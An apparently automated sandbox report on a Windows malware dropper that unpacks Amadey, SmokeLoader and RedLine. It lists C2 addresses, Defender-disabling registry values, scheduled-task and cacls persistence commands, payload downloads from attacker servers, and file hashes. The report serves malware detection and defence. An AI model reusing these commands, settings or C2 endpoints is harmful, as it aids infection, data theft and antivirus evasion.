Analysis
-
max time kernel
150s -
max time network
142s -
platform
windows10-1703_x64 -
resource
win10-20230703-en -
resource tags
arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system -
submitted
18/07/2023, 12:18 UTC
Static task
static1
Behavioral task
behavioral1
Sample
07b391f0c4afb44321b8ab3b38264dee7e20b06ecf171b5226f04ab2dfcfc6c2.exe
Resource
win10-20230703-en
General
-
Target
07b391f0c4afb44321b8ab3b38264dee7e20b06ecf171b5226f04ab2dfcfc6c2.exe
-
Size
515KB
-
MD5
9fc56b224e599f3d353f568cc28fc16b
-
SHA1
c07c792b9994692bb51d54aaae7398d7c7678d02
-
SHA256
07b391f0c4afb44321b8ab3b38264dee7e20b06ecf171b5226f04ab2dfcfc6c2
-
SHA512
f1dbade19577b70f14595495063e5505c770f97534211bfdd2e269aa8f085dde7618c936d7d7b2437d4116e9d1f17d0f64fe87cf4ee8900692764eb487462bce
-
SSDEEP
12288:hMrsy905oD+0grBc+1x4XpE2ZnNjNc2a/d6OmWAnPZu:ty9+0ngx6pE2ZnsfunPZu
Malware Config
Extracted
amadey
3.85
77.91.68.3/home/love/index.php
Extracted
smokeloader
2022
http://77.91.68.29/fks/
Extracted
redline
roma
77.91.68.56:19071
-
auth_value
f099c2cf92834dbc554a94e1456cf576
Signatures
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/files/0x000700000001af8b-137.dat healer behavioral1/files/0x000700000001af8b-136.dat healer behavioral1/memory/2352-138-0x0000000000BD0000-0x0000000000BDA000-memory.dmp healer -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" a6108301.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" a6108301.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" a6108301.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" a6108301.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" a6108301.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
pid Process 3980 v2926121.exe 4588 v5709144.exe 2352 a6108301.exe 1668 b6109387.exe 4592 danke.exe 5100 c3313770.exe 3792 d1321554.exe 5116 danke.exe 2644 10CF.exe 4136 danke.exe -
Loads dropped DLL 2 IoCs
pid Process 1980 rundll32.exe 216 msiexec.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" a6108301.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce v2926121.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" v2926121.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce v5709144.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" v5709144.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce 07b391f0c4afb44321b8ab3b38264dee7e20b06ecf171b5226f04ab2dfcfc6c2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 07b391f0c4afb44321b8ab3b38264dee7e20b06ecf171b5226f04ab2dfcfc6c2.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c3313770.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c3313770.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c3313770.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4884 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2352 a6108301.exe 2352 a6108301.exe 5100 c3313770.exe 5100 c3313770.exe 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found 3272 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3272 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 5100 c3313770.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 2352 a6108301.exe Token: SeShutdownPrivilege 3272 Process not Found Token: SeCreatePagefilePrivilege 3272 Process not Found Token: SeShutdownPrivilege 3272 Process not Found Token: SeCreatePagefilePrivilege 3272 Process not Found Token: SeShutdownPrivilege 3272 Process not Found Token: SeCreatePagefilePrivilege 3272 Process not Found Token: SeShutdownPrivilege 3272 Process not Found Token: SeCreatePagefilePrivilege 3272 Process not Found Token: SeShutdownPrivilege 3272 Process not Found Token: SeCreatePagefilePrivilege 3272 Process not Found Token: SeShutdownPrivilege 3272 Process not Found Token: SeCreatePagefilePrivilege 3272 Process not Found Token: SeShutdownPrivilege 3272 Process not Found Token: SeCreatePagefilePrivilege 3272 Process not Found Token: SeShutdownPrivilege 3272 Process not Found Token: SeCreatePagefilePrivilege 3272 Process not Found Token: SeShutdownPrivilege 3272 Process not Found Token: SeCreatePagefilePrivilege 3272 Process not Found -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1668 b6109387.exe -
Suspicious use of WriteProcessMemory 53 IoCs
description pid Process procid_target PID 2084 wrote to memory of 3980 2084 07b391f0c4afb44321b8ab3b38264dee7e20b06ecf171b5226f04ab2dfcfc6c2.exe 70 PID 2084 wrote to memory of 3980 2084 07b391f0c4afb44321b8ab3b38264dee7e20b06ecf171b5226f04ab2dfcfc6c2.exe 70 PID 2084 wrote to memory of 3980 2084 07b391f0c4afb44321b8ab3b38264dee7e20b06ecf171b5226f04ab2dfcfc6c2.exe 70 PID 3980 wrote to memory of 4588 3980 v2926121.exe 71 PID 3980 wrote to memory of 4588 3980 v2926121.exe 71 PID 3980 wrote to memory of 4588 3980 v2926121.exe 71 PID 4588 wrote to memory of 2352 4588 v5709144.exe 72 PID 4588 wrote to memory of 2352 4588 v5709144.exe 72 PID 4588 wrote to memory of 1668 4588 v5709144.exe 73 PID 4588 wrote to memory of 1668 4588 v5709144.exe 73 PID 4588 wrote to memory of 1668 4588 v5709144.exe 73 PID 1668 wrote to memory of 4592 1668 b6109387.exe 74 PID 1668 wrote to memory of 4592 1668 b6109387.exe 74 PID 1668 wrote to memory of 4592 1668 b6109387.exe 74 PID 3980 wrote to memory of 5100 3980 v2926121.exe 75 PID 3980 wrote to memory of 5100 3980 v2926121.exe 75 PID 3980 wrote to memory of 5100 3980 v2926121.exe 75 PID 4592 wrote to memory of 4884 4592 danke.exe 76 PID 4592 wrote to memory of 4884 4592 danke.exe 76 PID 4592 wrote to memory of 4884 4592 danke.exe 76 PID 4592 wrote to memory of 432 4592 danke.exe 78 PID 4592 wrote to memory of 432 4592 danke.exe 78 PID 4592 wrote to memory of 432 4592 danke.exe 78 PID 432 wrote to memory of 2096 432 cmd.exe 80 PID 432 wrote to memory of 2096 432 cmd.exe 80 PID 432 wrote to memory of 2096 432 cmd.exe 80 PID 432 wrote to memory of 4012 432 cmd.exe 81 PID 432 wrote to memory of 4012 432 cmd.exe 81 PID 432 wrote to memory of 4012 432 cmd.exe 81 PID 432 wrote to memory of 4612 432 cmd.exe 82 PID 432 wrote to memory of 4612 432 cmd.exe 82 PID 432 wrote to memory of 4612 432 cmd.exe 82 PID 432 wrote to memory of 4172 432 cmd.exe 83 PID 432 wrote to memory of 4172 432 cmd.exe 83 PID 432 wrote to memory of 4172 432 cmd.exe 83 PID 432 wrote to memory of 3728 432 cmd.exe 84 PID 432 wrote to memory of 3728 432 cmd.exe 84 PID 432 wrote to memory of 3728 432 cmd.exe 84 PID 432 wrote to memory of 4956 432 cmd.exe 85 PID 432 wrote to memory of 4956 432 cmd.exe 85 PID 432 wrote to memory of 4956 432 cmd.exe 85 PID 2084 wrote to memory of 3792 2084 07b391f0c4afb44321b8ab3b38264dee7e20b06ecf171b5226f04ab2dfcfc6c2.exe 86 PID 2084 wrote to memory of 3792 2084 07b391f0c4afb44321b8ab3b38264dee7e20b06ecf171b5226f04ab2dfcfc6c2.exe 86 PID 2084 wrote to memory of 3792 2084 07b391f0c4afb44321b8ab3b38264dee7e20b06ecf171b5226f04ab2dfcfc6c2.exe 86 PID 4592 wrote to memory of 1980 4592 danke.exe 88 PID 4592 wrote to memory of 1980 4592 danke.exe 88 PID 4592 wrote to memory of 1980 4592 danke.exe 88 PID 3272 wrote to memory of 2644 3272 Process not Found 89 PID 3272 wrote to memory of 2644 3272 Process not Found 89 PID 3272 wrote to memory of 2644 3272 Process not Found 89 PID 2644 wrote to memory of 216 2644 10CF.exe 90 PID 2644 wrote to memory of 216 2644 10CF.exe 90 PID 2644 wrote to memory of 216 2644 10CF.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\07b391f0c4afb44321b8ab3b38264dee7e20b06ecf171b5226f04ab2dfcfc6c2.exe"C:\Users\Admin\AppData\Local\Temp\07b391f0c4afb44321b8ab3b38264dee7e20b06ecf171b5226f04ab2dfcfc6c2.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v2926121.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v2926121.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v5709144.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v5709144.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a6108301.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a6108301.exe4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b6109387.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b6109387.exe4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe"C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe" /F6⤵
- Creates scheduled task(s)
PID:4884
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "danke.exe" /P "Admin:N"&&CACLS "danke.exe" /P "Admin:R" /E&&echo Y|CACLS "..\3ec1f323b5" /P "Admin:N"&&CACLS "..\3ec1f323b5" /P "Admin:R" /E&&Exit6⤵
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:2096
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "danke.exe" /P "Admin:N"7⤵PID:4012
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "danke.exe" /P "Admin:R" /E7⤵PID:4612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:4172
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\3ec1f323b5" /P "Admin:N"7⤵PID:3728
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\3ec1f323b5" /P "Admin:R" /E7⤵PID:4956
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main6⤵
- Loads dropped DLL
PID:1980
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c3313770.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c3313770.exe3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5100
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d1321554.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d1321554.exe2⤵
- Executes dropped EXE
PID:3792
-
-
C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exeC:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe1⤵
- Executes dropped EXE
PID:5116
-
C:\Users\Admin\AppData\Local\Temp\10CF.exeC:\Users\Admin\AppData\Local\Temp\10CF.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" -y .\wGGJ.QEP2⤵
- Loads dropped DLL
PID:216
-
-
C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exeC:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe1⤵
- Executes dropped EXE
PID:4136
Network
-
Remote address:77.91.68.3:80RequestPOST /home/love/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.3
Content-Length: 89
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Request3.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request3.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request3.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fruokuhvp.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 204
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 7
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gsedjkdu.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 297
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 43
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:8.8.8.8:53Request29.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request29.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request29.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ojayvava.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 365
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 47
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.3:80RequestGET /home/love/Plugins/cred64.dll HTTP/1.1
Host: 77.91.68.3
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1
-
Remote address:77.91.68.3:80RequestGET /home/love/Plugins/clip64.dll HTTP/1.1
Host: 77.91.68.3
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 06 Jul 2023 18:47:56 GMT
ETag: "16400-5ffd5f45b7dbc"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Request233.141.123.20.in-addr.arpaIN PTRResponse
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gcppgxk.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 289
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 47
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://edqfmbeead.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 337
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://tdylvnm.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 144
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.30:80RequestGET /fuzz/raman.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.30
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 18 Jul 2023 11:59:41 GMT
ETag: "1bab64-600c1a66b4540"
Accept-Ranges: bytes
Content-Length: 1813348
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Request30.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request30.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request30.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request9.57.101.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request209.143.182.52.in-addr.arpaIN PTRResponse
-
515 B 365 B 6 5
HTTP Request
POST http://77.91.68.3/home/love/index.phpHTTP Response
200 -
156 B 3
-
1.4kB 842 B 9 9
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
156 B 3
-
156 B 3
-
949 B 510 B 7 6
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
156 B 3
-
4.3kB 101.8kB 80 79
HTTP Request
GET http://77.91.68.3/home/love/Plugins/cred64.dllHTTP Response
404HTTP Request
GET http://77.91.68.3/home/love/Plugins/clip64.dllHTTP Response
200 -
156 B 3
-
872 B 510 B 7 6
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
156 B 3
-
1.5kB 1.2kB 10 9
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
71.3kB 1.9MB 1240 1348
HTTP Request
GET http://77.91.68.30/fuzz/raman.exeHTTP Response
200 -
156 B 3
-
156 B 3
-
207 B 207 B 3 3
DNS Request
3.68.91.77.in-addr.arpa
DNS Request
3.68.91.77.in-addr.arpa
DNS Request
3.68.91.77.in-addr.arpa
-
210 B 210 B 3 3
DNS Request
29.68.91.77.in-addr.arpa
DNS Request
29.68.91.77.in-addr.arpa
DNS Request
29.68.91.77.in-addr.arpa
-
73 B 159 B 1 1
DNS Request
233.141.123.20.in-addr.arpa
-
210 B 210 B 3 3
DNS Request
30.68.91.77.in-addr.arpa
DNS Request
30.68.91.77.in-addr.arpa
DNS Request
30.68.91.77.in-addr.arpa
-
70 B 156 B 1 1
DNS Request
9.57.101.20.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
209.143.182.52.in-addr.arpa
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD5ddb4df1428762a3e5c6244cdaf45d0ac
SHA198a5d28cfdbe4eff330d694938acb3a591a312d3
SHA2567a70f665f96c76c7e36cdd9a29c043b1de136c893d94409a8921e101f1bff6e4
SHA5124dad09fde355559c11cdd2850b17897c826b283c6dace77baa835f4df96daedc53f0744fa5dc84c7415dd5a2311511ef7da19bf9c30c3413b43e7bec86deb1a6
-
Filesize
1.7MB
MD5ddb4df1428762a3e5c6244cdaf45d0ac
SHA198a5d28cfdbe4eff330d694938acb3a591a312d3
SHA2567a70f665f96c76c7e36cdd9a29c043b1de136c893d94409a8921e101f1bff6e4
SHA5124dad09fde355559c11cdd2850b17897c826b283c6dace77baa835f4df96daedc53f0744fa5dc84c7415dd5a2311511ef7da19bf9c30c3413b43e7bec86deb1a6
-
Filesize
225KB
MD5d366bf327bb3296e7ef763e7473d15b4
SHA1febda255bc578c40397401c6c5db233df5bbbb91
SHA256b9fe373a8e20a521727fb9802c51469309ad8f64a7cd587c4de4b0d945caad08
SHA512511145d14f522ab0799186fcf4c0e43660653a110cc6ecc18a45ab0e79c5fa03d8df740fa882c022548fdc183cca078fe394c73b5d0bdc9b89866d2b82c429e9
-
Filesize
225KB
MD5d366bf327bb3296e7ef763e7473d15b4
SHA1febda255bc578c40397401c6c5db233df5bbbb91
SHA256b9fe373a8e20a521727fb9802c51469309ad8f64a7cd587c4de4b0d945caad08
SHA512511145d14f522ab0799186fcf4c0e43660653a110cc6ecc18a45ab0e79c5fa03d8df740fa882c022548fdc183cca078fe394c73b5d0bdc9b89866d2b82c429e9
-
Filesize
225KB
MD5d366bf327bb3296e7ef763e7473d15b4
SHA1febda255bc578c40397401c6c5db233df5bbbb91
SHA256b9fe373a8e20a521727fb9802c51469309ad8f64a7cd587c4de4b0d945caad08
SHA512511145d14f522ab0799186fcf4c0e43660653a110cc6ecc18a45ab0e79c5fa03d8df740fa882c022548fdc183cca078fe394c73b5d0bdc9b89866d2b82c429e9
-
Filesize
225KB
MD5d366bf327bb3296e7ef763e7473d15b4
SHA1febda255bc578c40397401c6c5db233df5bbbb91
SHA256b9fe373a8e20a521727fb9802c51469309ad8f64a7cd587c4de4b0d945caad08
SHA512511145d14f522ab0799186fcf4c0e43660653a110cc6ecc18a45ab0e79c5fa03d8df740fa882c022548fdc183cca078fe394c73b5d0bdc9b89866d2b82c429e9
-
Filesize
225KB
MD5d366bf327bb3296e7ef763e7473d15b4
SHA1febda255bc578c40397401c6c5db233df5bbbb91
SHA256b9fe373a8e20a521727fb9802c51469309ad8f64a7cd587c4de4b0d945caad08
SHA512511145d14f522ab0799186fcf4c0e43660653a110cc6ecc18a45ab0e79c5fa03d8df740fa882c022548fdc183cca078fe394c73b5d0bdc9b89866d2b82c429e9
-
Filesize
174KB
MD569b5076e38f37d92977a58563c3a1042
SHA139dabb5332da79ac4c2864a16e3f03ae6c3aa522
SHA2569fe4246749efeaa23d13781d30896344f86b7d78280c7060b3bd36876010f7da
SHA5127d4f8dcf2f94819d4430a1ca6a6d99980ef47b228285d965a26159a48af1d3d3273621b04922bdc6a191b976a5528bc4c968d126b6109d0c36ce259e66b6f451
-
Filesize
174KB
MD569b5076e38f37d92977a58563c3a1042
SHA139dabb5332da79ac4c2864a16e3f03ae6c3aa522
SHA2569fe4246749efeaa23d13781d30896344f86b7d78280c7060b3bd36876010f7da
SHA5127d4f8dcf2f94819d4430a1ca6a6d99980ef47b228285d965a26159a48af1d3d3273621b04922bdc6a191b976a5528bc4c968d126b6109d0c36ce259e66b6f451
-
Filesize
359KB
MD5608a5a38937561b1daa0debbd235112f
SHA16541a73ef5fe70fdc2ba871e80292591ce6fb1d3
SHA256d6a375cdecbfa11e5c77e5698bf785c9d0dc072e7581db6cda74538392ef15e0
SHA512353eb158d4dd537d049554f394d41b03c4169c1572526905abe0ea8b8987c59e83be709f30d2ddea1bc3c6879e4bdd2ebc41f30cdadc4f5f11cb8eafad6c7bee
-
Filesize
359KB
MD5608a5a38937561b1daa0debbd235112f
SHA16541a73ef5fe70fdc2ba871e80292591ce6fb1d3
SHA256d6a375cdecbfa11e5c77e5698bf785c9d0dc072e7581db6cda74538392ef15e0
SHA512353eb158d4dd537d049554f394d41b03c4169c1572526905abe0ea8b8987c59e83be709f30d2ddea1bc3c6879e4bdd2ebc41f30cdadc4f5f11cb8eafad6c7bee
-
Filesize
31KB
MD573f8b8cf0a1780592111be1647074abf
SHA18972b7c99feac5ab0b7b64bd7d47b2ce56d18435
SHA2569bc104818e9821799f5a99d732c9381f2785303d7feb4b2037e7e6bb007ed8e4
SHA5129165d15e44cdf4fedc06cd7ef5ad8eb13db327fca6c958cbffae0a7d11ac6e35e40c7fa9504905f459a689e7e5de1a56e2cf8cddcc7b88caea0b0163eccb64db
-
Filesize
31KB
MD573f8b8cf0a1780592111be1647074abf
SHA18972b7c99feac5ab0b7b64bd7d47b2ce56d18435
SHA2569bc104818e9821799f5a99d732c9381f2785303d7feb4b2037e7e6bb007ed8e4
SHA5129165d15e44cdf4fedc06cd7ef5ad8eb13db327fca6c958cbffae0a7d11ac6e35e40c7fa9504905f459a689e7e5de1a56e2cf8cddcc7b88caea0b0163eccb64db
-
Filesize
235KB
MD53646a00a6b6328f5052a987cf1c84864
SHA14ed6acc3f969a235af3f65c04b0e5954150f9521
SHA256cad5d2d3a1b3b13033c87c014c20d84f0c8d818075141a676fbb2ae6c90e8676
SHA512145a10a4ed28d12c7760c92df4ef544bc191d9e0bdf4301809ed1ee41bf4fdd7db8907fd51c515f4fe0498bb19b92d215e13ffad23b1e6c2a5a0a4e43ae0f10f
-
Filesize
235KB
MD53646a00a6b6328f5052a987cf1c84864
SHA14ed6acc3f969a235af3f65c04b0e5954150f9521
SHA256cad5d2d3a1b3b13033c87c014c20d84f0c8d818075141a676fbb2ae6c90e8676
SHA512145a10a4ed28d12c7760c92df4ef544bc191d9e0bdf4301809ed1ee41bf4fdd7db8907fd51c515f4fe0498bb19b92d215e13ffad23b1e6c2a5a0a4e43ae0f10f
-
Filesize
13KB
MD5e53c9cf3d3d8e7fde3b04f59c9f610c2
SHA1335dc0d108c1c2eb25e3e6565c5fc1254597492d
SHA256bb51150a3f601d548a90d44c010649850d84fbc3b31a5cbb441050a08d3252a4
SHA5126730d95c16e0174d1d2bbf77a28020c77cbd8f9a47aca9c5902348d092ef6b87000d888346a5f1983b49f1b0dfde9fcd3d11d09b27f8f5bc5964d2b438805742
-
Filesize
13KB
MD5e53c9cf3d3d8e7fde3b04f59c9f610c2
